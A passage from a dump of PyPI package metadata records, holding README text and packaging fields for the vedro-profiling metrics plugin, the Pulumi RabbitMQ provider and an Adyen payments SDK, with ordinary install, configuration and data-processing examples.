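    '{"type":"Metric","metric":"cpu_percent","data":{"type":"gauge","unit":"percent"}}',
    '{"type":"Point","metric":"cpu_percent","data":{"time":"2026-01-26T10:00:00.123Z","value":25.5,"tags":{"target":"app-1","method":"docker","run":"r1","env":"staging"}}}',
    '{"type":"Point","metric":"cpu_percent","data":{"time":"2026-01-26T10:00:01.123Z","value":30.0,"tags":{"target":"app-2","method":"docker","run":"r1","env":"prod"}}}',
]

# Keep only data points whose tags match.
staging_points = [
    rec for rec in map(json.loads, lines)
    if rec["type"] == "Point" and rec["data"]["tags"].get("env") == "staging"
]
print(staging_points[0]["data"]["value"])  # 25.5
```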
## Processing Data
### Extract Data Points Only
```bash
cat .profiling/profiling.ndjson | jq -c 'select(.type=="Point")'
```
### Filter by Tags
```bash
cat .profiling/profiling.ndjson | jq -c 'select(.type=="Point" and .data.tags.env=="staging")'
```
### Convert to InfluxDB Line Protocol
```bash
cat .profiling/profiling.ndjson | jq -r '
select(.type=="Point") |
"\(.metric),target=\(.data.tags.target),method=\(.data.tags.method) value=\(.data.value) \(.data.time | fromdate * 1000000000)"
'
```
### Aggregate Metrics
```bash
# Average CPU by target
cat .profiling/profiling.ndjson | jq -s '
[.[] | select(.type=="Point" and .metric=="cpu_percent")] |
group_by(.data.tags.target) |
map({target: .[0].data.tags.target, avg_cpu: ([.[].data.value] | add / length)})
'
```
## Features
- **Multiple Profiling Methods**: Monitor both system-level metrics (via psutil) and Docker container metrics
- **k6-Compatible Format**: Export metrics in NDJSON format for easy integration with monitoring tools
- **Custom Tags**: Add custom tags for filtering and grouping metrics
- **Visualization**: Generate matplotlib plots for quick visual analysis
- **Non-Blocking**: Uses background threads to minimize impact on test execution
- **Flexible Configuration**: Configure via code or command-line arguments
## Integration Examples
### Grafana + InfluxDB
1. Convert NDJSON to InfluxDB Line Protocol
2. Import into InfluxDB:
```bash
influx write --bucket performance --file profiling.influx
```
3. Create Grafana dashboard using InfluxDB as data source
### Custom Analysis
```python
import json
# Read and process metrics
with open('.profiling/profiling.ndjson') as f:
for line in f:
point = json.loads(line)
if point['type'] == 'Point':
metric = point['metric']
value = point['data']['value']
tags = point['data']['tags']
# Process metrics...
```
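The processing loop above can be extended into an aggregation, mirroring the jq average-CPU example. A sketch with inline sample points standing in for the real `.profiling/profiling.ndjson`:

```python
import json
from collections import defaultdict

# Inline sample points (same shape as .profiling/profiling.ndjson).
lines = [
    '{"type":"Point","metric":"cpu_percent","data":{"value":20.0,"tags":{"target":"app-1"}}}',
    '{"type":"Point","metric":"cpu_percent","data":{"value":30.0,"tags":{"target":"app-1"}}}',
    '{"type":"Point","metric":"cpu_percent","data":{"value":50.0,"tags":{"target":"app-2"}}}',
]

# Group CPU samples by target, then average each group.
values = defaultdict(list)
for line in lines:
    rec = json.loads(line)
    if rec["type"] == "Point" and rec["metric"] == "cpu_percent":
        values[rec["data"]["tags"]["target"]].append(rec["data"]["value"])

avg_cpu = {target: sum(v) / len(v) for target, v in values.items()}
print(avg_cpu)  # {'app-1': 25.0, 'app-2': 50.0}
```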
| text/markdown | null | Nikita Mikheev <thelol1mpo@gmail.com> | null | null | Apache License Version 2.0, January 2004 http://www.apache.org/licenses/ TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 1. Definitions. "License" shall mean the terms and conditions for use, reproduction, and distribution as defined by Sections 1 through 9 of this document. "Licensor" shall mean the copyright owner or entity authorized by the copyright owner that is granting the License. "Legal Entity" shall mean the union of the acting entity and all other entities that control, are controlled by, or are under common control with that entity. For the purposes of this definition, "control" means (i) the power, direct or indirect, to cause the direction or management of such entity, whether by contract or otherwise, or (ii) ownership of fifty percent (50%) or more of the outstanding shares, or (iii) beneficial ownership of such entity. "You" (or "Your") shall mean an individual or Legal Entity exercising permissions granted by this License. "Source" form shall mean the preferred form for making modifications, including but not limited to software source code, documentation source, and configuration files. "Object" form shall mean any form resulting from mechanical transformation or translation of a Source form, including but not limited to compiled object code, generated documentation, and conversions to other media types. "Work" shall mean the work of authorship, whether in Source or Object form, made available under the License, as indicated by a copyright notice that is included in or attached to the work (an example is provided in the Appendix below). "Derivative Works" shall mean any work, whether in Source or Object form, that is based on (or derived from) the Work and for which the editorial revisions, annotations, elaborations, or other modifications represent, as a whole, an original work of authorship. 
For the purposes of this License, Derivative Works shall not include works that remain separable from, or merely link (or bind by name) to the interfaces of, the Work and Derivative Works thereof. "Contribution" shall mean any work of authorship, including the original version of the Work and any modifications or additions to that Work or Derivative Works thereof, that is intentionally submitted to Licensor for inclusion in the Work by the copyright owner or by an individual or Legal Entity authorized to submit on behalf of the copyright owner. For the purposes of this definition, "submitted" means any form of electronic, verbal, or written communication sent to the Licensor or its representatives, including but not limited to communication on electronic mailing lists, source code control systems, and issue tracking systems that are managed by, or on behalf of, the Licensor for the purpose of discussing and improving the Work, but excluding communication that is conspicuously marked or otherwise designated in writing by the copyright owner as "Not a Contribution." "Contributor" shall mean Licensor and any individual or Legal Entity on behalf of whom a Contribution has been received by Licensor and subsequently incorporated within the Work. 2. Grant of Copyright License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable copyright license to reproduce, prepare Derivative Works of, publicly display, publicly perform, sublicense, and distribute the Work and such Derivative Works in Source or Object form. 3. Grant of Patent License. 
Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable (except as stated in this section) patent license to make, have made, use, offer to sell, sell, import, and otherwise transfer the Work, where such license applies only to those patent claims licensable by such Contributor that are necessarily infringed by their Contribution(s) alone or by combination of their Contribution(s) with the Work to which such Contribution(s) was submitted. If You institute patent litigation against any entity (including a cross-claim or counterclaim in a lawsuit) alleging that the Work or a Contribution incorporated within the Work constitutes direct or contributory patent infringement, then any patent licenses granted to You under this License for that Work shall terminate as of the date such litigation is filed. 4. Redistribution. You may reproduce and distribute copies of the Work or Derivative Works thereof in any medium, with or without modifications, and in Source or Object form, provided that You meet the following conditions: (a) You must give any other recipients of the Work or Derivative Works a copy of this License; and (b) You must cause any modified files to carry prominent notices stating that You changed the files; and (c) You must retain, in the Source form of any Derivative Works that You distribute, all copyright, patent, trademark, and attribution notices from the Source form of the Work, excluding those notices that do not pertain to any part of the Derivative Works; and (d) If the Work includes a "NOTICE" text file as part of its distribution, then any Derivative Works that You distribute must include a readable copy of the attribution notices contained within such NOTICE file, excluding those notices that do not pertain to any part of the Derivative Works, in at least one of the following places: within a NOTICE text file distributed as part of the 
Derivative Works; within the Source form or documentation, if provided along with the Derivative Works; or, within a display generated by the Derivative Works, if and wherever such third-party notices normally appear. The contents of the NOTICE file are for informational purposes only and do not modify the License. You may add Your own attribution notices within Derivative Works that You distribute, alongside or as an addendum to the NOTICE text from the Work, provided that such additional attribution notices cannot be construed as modifying the License. You may add Your own copyright statement to Your modifications and may provide additional or different license terms and conditions for use, reproduction, or distribution of Your modifications, or for any such Derivative Works as a whole, provided Your use, reproduction, and distribution of the Work otherwise complies with the conditions stated in this License. 5. Submission of Contributions. Unless You explicitly state otherwise, any Contribution intentionally submitted for inclusion in the Work by You to the Licensor shall be under the terms and conditions of this License, without any additional terms or conditions. Notwithstanding the above, nothing herein shall supersede or modify the terms of any separate license agreement you may have executed with Licensor regarding such Contributions. 6. Trademarks. This License does not grant permission to use the trade names, trademarks, service marks, or product names of the Licensor, except as required for reasonable and customary use in describing the origin of the Work and reproducing the content of the NOTICE file. 7. Disclaimer of Warranty. 
Unless required by applicable law or agreed to in writing, Licensor provides the Work (and each Contributor provides its Contributions) on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied, including, without limitation, any warranties or conditions of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A PARTICULAR PURPOSE. You are solely responsible for determining the appropriateness of using or redistributing the Work and assume any risks associated with Your exercise of permissions under this License. 8. Limitation of Liability. In no event and under no legal theory, whether in tort (including negligence), contract, or otherwise, unless required by applicable law (such as deliberate and grossly negligent acts) or agreed to in writing, shall any Contributor be liable to You for damages, including any direct, indirect, special, incidental, or consequential damages of any character arising as a result of this License or out of the use or inability to use the Work (including but not limited to damages for loss of goodwill, work stoppage, computer failure or malfunction, or any and all other commercial damages or losses), even if such Contributor has been advised of the possibility of such damages. 9. Accepting Warranty or Additional Liability. While redistributing the Work or Derivative Works thereof, You may choose to offer, and charge a fee for, acceptance of support, warranty, indemnity, or other liability obligations and/or rights consistent with this License. However, in accepting such obligations, You may act only on Your own behalf and on Your sole responsibility, not on behalf of any other Contributor, and only if You agree to indemnify, defend, and hold each Contributor harmless for any liability incurred by, or claims asserted against, such Contributor by reason of your accepting any such warranty or additional liability. END OF TERMS AND CONDITIONS APPENDIX: How to apply the Apache License to your work. 
To apply the Apache License to your work, attach the following boilerplate notice, with the fields enclosed by brackets "[]" replaced with your own identifying information. (Don't include the brackets!) The text should be enclosed in the appropriate comment syntax for the file format. We also recommend that a file or class name and description of purpose be included on the same "printed page" as the copyright notice for easier identification within third-party archives. Copyright [yyyy] [name of copyright owner] Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. | null | [
"License :: OSI Approved :: Apache Software License",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Programming Language :: Python :: 3.13",
"Programming Language :: Python :: 3.14",
"Typing :: Typed"
] | [] | null | null | >=3.10 | [] | [] | [] | [
"docker<8.0.0,>=7.0.0",
"matplotlib<4.0.0,>=3.10.0",
"psutil<8.0.0,>=7.0.0",
"vedro<2.0.0,>=1.13.0"
] | [] | [] | [] | [
"Homepage, https://github.com/Lolimpo/vedro-profiling",
"Repository, https://github.com/Lolimpo/vedro-profiling"
] | uv/0.10.4 {"installer":{"name":"uv","version":"0.10.4","subcommand":["publish"]},"python":null,"implementation":{"name":null,"version":null},"distro":{"name":"Ubuntu","version":"24.04","id":"noble","libc":null},"system":{"name":null,"release":null},"cpu":null,"openssl_version":null,"setuptools_version":null,"rustc_version":null,"ci":true} | 2026-02-20T06:38:47.614622 | vedro_profiling-0.2.0-py3-none-any.whl | 16,597 | 96/3c/5602c19add5081158cbe2fc868f420d89f13fb4849ea7dacc496b1137369/vedro_profiling-0.2.0-py3-none-any.whl | py3 | bdist_wheel | null | false | 0e6cb9c7f8c15c94b35998d0b1ccd8cc | bbf00c716e9796c2fd982711bb9f922c58207bb4ccc4a7581ddba59312d16bd3 | 963c5602c19add5081158cbe2fc868f420d89f13fb4849ea7dacc496b1137369 | null | [
"LICENSE.txt"
] | 221 |
2.4 | pulumi-rabbitmq | 3.5.0a1771569109 | A Pulumi package for creating and managing RabbitMQ resources. | [](https://github.com/pulumi/pulumi-rabbitmq/actions)
[](https://slack.pulumi.com)
[](https://www.npmjs.com/package/@pulumi/rabbitmq)
[](https://pypi.org/project/pulumi-rabbitmq)
[](https://badge.fury.io/nu/pulumi.rabbitmq)
[](https://pkg.go.dev/github.com/pulumi/pulumi-rabbitmq/sdk/v3/go)
[](https://github.com/pulumi/pulumi-rabbitmq/blob/master/LICENSE)
# RabbitMQ Resource Provider
The RabbitMQ resource provider for Pulumi lets you manage RabbitMQ resources in your cloud programs. To use
this package, please [install the Pulumi CLI first](https://pulumi.io/).
## Installing
This package is available in many languages in the standard packaging formats.
### Node.js (JavaScript/TypeScript)
To use from JavaScript or TypeScript in Node.js, install using either `npm`:
$ npm install @pulumi/rabbitmq
or `yarn`:
$ yarn add @pulumi/rabbitmq
### Python
To use from Python, install using `pip`:
$ pip install pulumi_rabbitmq
### Go
To use from Go, use `go get` to grab the latest version of the library:
$ go get github.com/pulumi/pulumi-rabbitmq/sdk/v3
### .NET
To use from .NET, install using `dotnet add package`:
$ dotnet add package Pulumi.Rabbitmq
## Configuration
The following configuration points are available:
* `rabbitmq:endpoint` - (Required) The HTTP URL of the management plugin on the RabbitMQ server. The RabbitMQ management
plugin must be enabled in order to use this provider. Note: This is not the IP address or hostname of the RabbitMQ server
that you would use to access RabbitMQ directly. May be set via the `RABBITMQ_ENDPOINT` environment variable.
* `rabbitmq:username` - (Required) Username to use to authenticate with the server. May be set via the `RABBITMQ_USERNAME`
environment variable.
* `rabbitmq:password` - (Optional) Password for the given user. May be set via the `RABBITMQ_PASSWORD` environment variable.
* `rabbitmq:insecure` - (Optional) Trust self-signed certificates. May be set via the `RABBITMQ_INSECURE` environment variable.
* `rabbitmq:cacertFile` - (Optional) The path to a custom CA / intermediate certificate. May be set via the `RABBITMQ_CACERT`
environment variable.
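As a sketch, the same settings can be supplied through the environment variables listed above instead of Pulumi config (the values shown are the common RabbitMQ defaults, used here only as placeholders):

```shell
# Placeholder values — point these at your RabbitMQ management endpoint.
export RABBITMQ_ENDPOINT="http://localhost:15672"
export RABBITMQ_USERNAME="guest"
export RABBITMQ_PASSWORD="guest"
```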
## Reference
For further information, please visit [the RabbitMQ provider docs](https://www.pulumi.com/docs/intro/cloud-providers/rabbitmq) or for detailed reference documentation, please visit [the API docs](https://www.pulumi.com/docs/reference/pkg/rabbitmq).
| text/markdown | null | null | null | null | Apache-2.0 | pulumi, rabbitmq | [] | [] | null | null | >=3.9 | [] | [] | [] | [
"parver>=0.2.1",
"pulumi<4.0.0,>=3.165.0",
"semver>=2.8.1",
"typing-extensions<5,>=4.11; python_version < \"3.11\""
] | [] | [] | [] | [
"Homepage, https://pulumi.io",
"Repository, https://github.com/pulumi/pulumi-rabbitmq"
] | twine/6.2.0 CPython/3.11.8 | 2026-02-20T06:38:13.952181 | pulumi_rabbitmq-3.5.0a1771569109.tar.gz | 33,201 | ba/7a/e12e8942abcc6c1f9895f1f015bbd0b65344fdc0633cfcbbefc9eb6dfdd8/pulumi_rabbitmq-3.5.0a1771569109.tar.gz | source | sdist | null | false | 9121986447320841f0be5719a21f9533 | cd2d421fdbd2330893129c0a3b7fb64ad319c64ad3343e45bc414bd3331de2af | ba7ae12e8942abcc6c1f9895f1f015bbd0b65344fdc0633cfcbbefc9eb6dfdd8 | null | [] | 201 |
2.4 | adyen-apimatic-sdk | 1.0.1 | SDKs for Adyen APIs |
# Getting Started with Adyen APIs
## Introduction
Adyen Checkout API provides a simple and flexible way to initiate and authorise online payments. You can use the same integration for payments made with cards (including 3D Secure), mobile wallets, and local payment methods (for example, iDEAL and Sofort).
This API reference provides information on available endpoints and how to interact with them. To learn more about the API, visit [online payments documentation](https://docs.adyen.com/online-payments).
### Authentication
Each request to Checkout API must be signed with an API key. For this, [get your API key](https://docs.adyen.com/development-resources/api-credentials#generate-api-key) from your Customer Area, and set this key to the `X-API-Key` header value, for example:
```
curl \
-H "Content-Type: application/json" \
-H "X-API-Key: YOUR_API_KEY" \
...
```
### Versioning
Checkout API supports [versioning](https://docs.adyen.com/development-resources/versioning) using a version suffix in the endpoint URL. This suffix has the following format: "vXX", where XX is the version number.
For example:
```
https://checkout-test.adyen.com/v71/payments
```
### Server-side API libraries
We provide open-source [server-side API libraries](https://docs.adyen.com/development-resources/libraries/) in several languages:
- PHP
- Java
- Node.js
- .NET
- Go
- Python
- Ruby
- Apex (beta)
See our [integration examples](https://github.com/adyen-examples#%EF%B8%8F-official-integration-examples) for example uses of the libraries.
### Developer resources
Checkout API is available through a Postman collection. Click the button below to create a fork, then set the environment variables at **Environments** > **Adyen APIs**.
[](https://god.gw.postman.com/run-collection/25716737-46ad970e-dc9e-4246-bac2-769c6083e7b5?action=collection%2Ffork&source=rip_markdown&collection-url=entityId%3D25716737-46ad970e-dc9e-4246-bac2-769c6083e7b5%26entityType%3Dcollection%26workspaceId%3Da8d63f9f-cfc7-4810-90c5-9e0c60030d3e#?env%5BAdyen%20APIs%5D=W3sia2V5IjoiWC1BUEktS2V5IiwidmFsdWUiOiIiLCJlbmFibGVkIjp0cnVlLCJ0eXBlIjoic2VjcmV0In0seyJrZXkiOiJZT1VSX01FUkNIQU5UX0FDQ09VTlQiLCJ2YWx1ZSI6IiIsImVuYWJsZWQiOnRydWUsInR5cGUiOiJkZWZhdWx0In0seyJrZXkiOiJZT1VSX0NPTVBBTllfQUNDT1VOVCIsInZhbHVlIjoiIiwiZW5hYmxlZCI6dHJ1ZSwidHlwZSI6ImRlZmF1bHQifSx7ImtleSI6IllPVVJfQkFMQU5DRV9QTEFURk9STSIsInZhbHVlIjoiIiwiZW5hYmxlZCI6dHJ1ZSwidHlwZSI6ImRlZmF1bHQifV0=)
### Going live
To access the live endpoints, you need an API key from your live Customer Area.
The live endpoint URLs contain a prefix which is unique to your company account, for example:
```
https://{PREFIX}-checkout-live.adyenpayments.com/checkout/v71/payments
```
Get your `{PREFIX}` from your live Customer Area under **Developers** > **API URLs** > **Prefix**.
When preparing to do live transactions with Checkout API, follow the [go-live checklist](https://docs.adyen.com/online-payments/go-live-checklist) to make sure you've got all the required configuration in place.
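The test and live URL patterns above can be captured in a tiny helper. This is a sketch for illustration only — `build_checkout_url` is a hypothetical name, not part of the SDK, and the live prefix must come from your Customer Area:

```python
from typing import Optional

def build_checkout_url(path: str, version: int, live_prefix: Optional[str] = None) -> str:
    """Build a Checkout API endpoint URL with the 'vXX' version suffix.

    When live_prefix is given, the live URL pattern with the company-specific
    prefix is used; otherwise the test endpoint is returned.
    """
    if live_prefix:
        return f"https://{live_prefix}-checkout-live.adyenpayments.com/checkout/v{version}/{path}"
    return f"https://checkout-test.adyen.com/v{version}/{path}"

print(build_checkout_url("payments", 71))
# https://checkout-test.adyen.com/v71/payments
```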
### Release notes
Have a look at the [release notes](https://docs.adyen.com/online-payments/release-notes?integration_type=api&version=71) to find out what changed in this version!
## Management API
Configure and manage your Adyen company and merchant accounts, stores, and payment terminals.
### Authentication
Each request to the Management API must be signed with an API key. [Generate your API key](https://docs.adyen.com/development-resources/api-credentials#generate-api-key) in the Customer Area and then set this key to the `X-API-Key` header value.
To access the live endpoints, you need to generate a new API key in your live Customer Area.
### Versioning
Management API handles versioning as part of the endpoint URL. For example, to send a request to this version of the `/companies/{companyId}/webhooks` endpoint, use:
```text
https://management-test.adyen.com/v3/companies/{companyId}/webhooks
```
### Going live
To access the live endpoints, you need an API key from your live Customer Area. Use this API key to make requests to:
```text
https://management-live.adyen.com/v3
```
### Release notes
Have a look at the [release notes](https://docs.adyen.com/release-notes/management-api) to find out what changed in this version!
## Install the Package
The package is compatible with Python versions `3.7+`.
Install the package from PyPi using the following pip command:
```bash
pip install adyen-apimatic-sdk==1.0.1
```
You can also view the package at:
https://pypi.python.org/pypi/adyen-apimatic-sdk/1.0.1
## Initialize the API Client
**_Note:_** Documentation for the client can be found [here.](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/client.md)
The following parameters are configurable for the API Client:
| Parameter | Type | Description |
| --- | --- | --- |
| environment | [`Environment`](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/README.md#environments) | The API environment. <br> **Default: `Environment.PRODUCTION`** |
| http_client_instance | `Union[Session, HttpClientProvider]` | The HTTP client supplied by the SDK user for making requests |
| override_http_client_configuration | `bool` | Whether to override properties of the HTTP client supplied by the SDK user |
| http_call_back | `HttpCallBack` | The callback value that is invoked before and after an HTTP call is made to an endpoint |
| timeout | `float` | The value to use for connection timeout. <br> **Default: 30** |
| max_retries | `int` | The number of times to retry an endpoint call if it fails. <br> **Default: 0** |
| backoff_factor | `float` | A backoff factor to apply between attempts after the second try. <br> **Default: 2** |
| retry_statuses | `Array of int` | The HTTP status codes on which to retry. <br> **Default: [408, 413, 429, 500, 502, 503, 504, 521, 522, 524]** |
| retry_methods | `Array of string` | The HTTP methods on which to retry. <br> **Default: ["GET", "PUT"]** |
| proxy_settings | [`ProxySettings`](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/proxy-settings.md) | Optional proxy configuration to route HTTP requests through a proxy server. |
| logging_configuration | [`LoggingConfiguration`](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/logging-configuration.md) | The SDK logging configuration for API calls |
| api_key_auth_credentials | [`ApiKeyAuthCredentials`](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/auth/custom-header-signature.md) | The credential object for Custom Header Signature |
| basic_auth_credentials | [`BasicAuthCredentials`](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/auth/basic-authentication.md) | The credential object for Basic Authentication |
The API client can be initialized as follows:
### Code-Based Client Initialization
```python
import logging
from adyenapis.adyenapis_client import AdyenapisClient
from adyenapis.configuration import Environment
from adyenapis.http.auth.api_key_auth import ApiKeyAuthCredentials
from adyenapis.http.auth.basic_auth import BasicAuthCredentials
from adyenapis.logging.configuration.api_logging_configuration import LoggingConfiguration
from adyenapis.logging.configuration.api_logging_configuration import RequestLoggingConfiguration
from adyenapis.logging.configuration.api_logging_configuration import ResponseLoggingConfiguration
client = AdyenapisClient(
api_key_auth_credentials=ApiKeyAuthCredentials(
x_api_key='X-API-Key'
),
basic_auth_credentials=BasicAuthCredentials(
username='Username',
password='Password'
),
environment=Environment.PRODUCTION,
logging_configuration=LoggingConfiguration(
log_level=logging.INFO,
request_logging_config=RequestLoggingConfiguration(
log_body=True
),
response_logging_config=ResponseLoggingConfiguration(
log_headers=True
)
)
)
```
### Environment-Based Client Initialization
```python
from adyenapis.adyenapis_client import AdyenapisClient
# Specify the path to your .env file if it’s located outside the project’s root directory.
client = AdyenapisClient.from_environment(dotenv_path='/path/to/.env')
```
See the [Environment-Based Client Initialization](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/environment-based-client-initialization.md) section for details.
## Environments
The SDK can be configured to use a different environment for making API calls. Available environments are:
### Fields
| Name | Description |
| --- | --- |
| PRODUCTION | **Default** |
## Authorization
This API uses the following authentication schemes.
* [`ApiKeyAuth (Custom Header Signature)`](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/auth/custom-header-signature.md)
* [`BasicAuth (Basic Authentication)`](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/auth/basic-authentication.md)
## List of APIs
* [Paymentlinks](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/controllers/paymentlinks.md)
* [Account-Companylevel](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/controllers/account-companylevel.md)
* [Account-Merchantlevel](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/controllers/account-merchantlevel.md)
* [Account-Storelevel](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/controllers/account-storelevel.md)
* [Payoutsettings-Merchantlevel](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/controllers/payoutsettings-merchantlevel.md)
* [Users-Companylevel](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/controllers/users-companylevel.md)
* [Users-Merchantlevel](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/controllers/users-merchantlevel.md)
* [My API Credential](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/controllers/my-ap-icredential.md)
* [API Credentials-Companylevel](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/controllers/ap-icredentials-companylevel.md)
* [API Credentials-Merchantlevel](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/controllers/ap-icredentials-merchantlevel.md)
* [API Key-Companylevel](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/controllers/ap-ikey-companylevel.md)
* [API Key-Merchantlevel](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/controllers/ap-ikey-merchantlevel.md)
* [Clientkey-Companylevel](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/controllers/clientkey-companylevel.md)
* [Clientkey-Merchantlevel](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/controllers/clientkey-merchantlevel.md)
* [Allowedorigins-Companylevel](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/controllers/allowedorigins-companylevel.md)
* [Allowedorigins-Merchantlevel](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/controllers/allowedorigins-merchantlevel.md)
* [Webhooks-Companylevel](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/controllers/webhooks-companylevel.md)
* [Webhooks-Merchantlevel](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/controllers/webhooks-merchantlevel.md)
* [Paymentmethods-Merchantlevel](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/controllers/paymentmethods-merchantlevel.md)
* [Terminals-Terminallevel](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/controllers/terminals-terminallevel.md)
* [Terminalactions-Companylevel](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/controllers/terminalactions-companylevel.md)
* [Terminalactions-Terminallevel](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/controllers/terminalactions-terminallevel.md)
* [Terminalorders-Companylevel](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/controllers/terminalorders-companylevel.md)
* [Terminalorders-Merchantlevel](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/controllers/terminalorders-merchantlevel.md)
* [Terminalsettings-Companylevel](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/controllers/terminalsettings-companylevel.md)
* [Terminalsettings-Merchantlevel](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/controllers/terminalsettings-merchantlevel.md)
* [Terminalsettings-Storelevel](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/controllers/terminalsettings-storelevel.md)
* [Terminalsettings-Terminallevel](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/controllers/terminalsettings-terminallevel.md)
* [Androidfiles-Companylevel](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/controllers/androidfiles-companylevel.md)
* [Splitconfiguration-Merchantlevel](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/controllers/splitconfiguration-merchantlevel.md)
* [Payments](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/controllers/payments.md)
* [Donations](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/controllers/donations.md)
* [Modifications](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/controllers/modifications.md)
* [Recurring](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/controllers/recurring.md)
* [Orders](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/controllers/orders.md)
* [Utility](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/controllers/utility.md)
## SDK Infrastructure
### Configuration
* [ProxySettings](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/proxy-settings.md)
* [Environment-Based Client Initialization](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/environment-based-client-initialization.md)
* [AbstractLogger](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/abstract-logger.md)
* [LoggingConfiguration](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/logging-configuration.md)
* [RequestLoggingConfiguration](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/request-logging-configuration.md)
* [ResponseLoggingConfiguration](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/response-logging-configuration.md)
### HTTP
* [HttpResponse](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/http-response.md)
* [HttpRequest](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/http-request.md)
### Utilities
* [ApiResponse](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/api-response.md)
* [ApiHelper](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/api-helper.md)
* [HttpDateTime](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/http-date-time.md)
* [RFC3339DateTime](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/rfc3339-date-time.md)
* [UnixDateTime](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/unix-date-time.md)
| text/markdown | null | Muhammad Rafay <muhammad.rafay@apimatic.io> | null | null | null | null | [] | [] | null | null | >=3.7 | [] | [] | [] | [
"apimatic-core>=0.2.24,~=0.2.0",
"apimatic-core-interfaces>=0.1.8,~=0.1.0",
"apimatic-requests-client-adapter>=0.1.10,~=0.1.0",
"python-dotenv<2.0,>=0.21",
"deprecation~=2.1",
"pytest>=7.2.2; extra == \"testutils\""
] | [] | [] | [] | [
"Documentation, https://docs.adyen.com/api-explorer/"
